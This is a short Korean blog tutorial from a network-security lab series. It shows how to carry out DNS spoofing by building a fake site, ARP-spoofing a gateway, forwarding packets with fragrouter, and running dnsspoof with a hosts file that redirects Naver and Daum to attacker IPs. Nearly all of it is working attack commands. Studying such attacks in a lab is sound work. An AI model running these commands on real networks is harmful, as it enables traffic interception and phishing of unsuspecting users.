View
<DNS Spoofing>
[공격 형태]
ARP Spoofing 으로 GW 를 속이고,
Fragrouter 로 패킷 포워딩 하고,
DNS Spoofing 으로 DNS 를 속여서
원하는 사이트로 접근 유도한다
[공격 순서]
Web Site & Server 구축(가짜 사이트 제작및 서버 구축)
ARP Spoofing
Forwording
Hosts 생성 (DNS 캐쉬 정보를 넣는다)
DNS Spoofing
[공격 방법]
양식
# dnsspoof [-i interface] [-f hosts file]
# dnsspoof -i eth1 -f hosts
[실습]
Web Site & Server 구축
# vi /etc/var/www/index.html
수정
# /etc/init.d/apache2 restart
ARP Spoofing
# arpspoof -i eth1 -t 192.168.10.2 192.168.10.252
Forwording
# fragrouter -B1
Hosts 파일 생성
# vi hosts
예)
192.168.10.3 www.naver.com
192.168.10.4 www.daum.net
DNS Spoofing
# dnsspoof -i eth1 -f hosts
반응형
'Network Security' 카테고리의 다른 글
| IP Spoofing (0) | 2022.11.28 |
|---|---|
| STP 공격 / 방어 (0) | 2022.11.28 |
| CDP Attack (0) | 2022.11.28 |
| HSRP Attack (0) | 2022.11.28 |
| DHCP Spoofing (1) | 2022.11.28 |
reply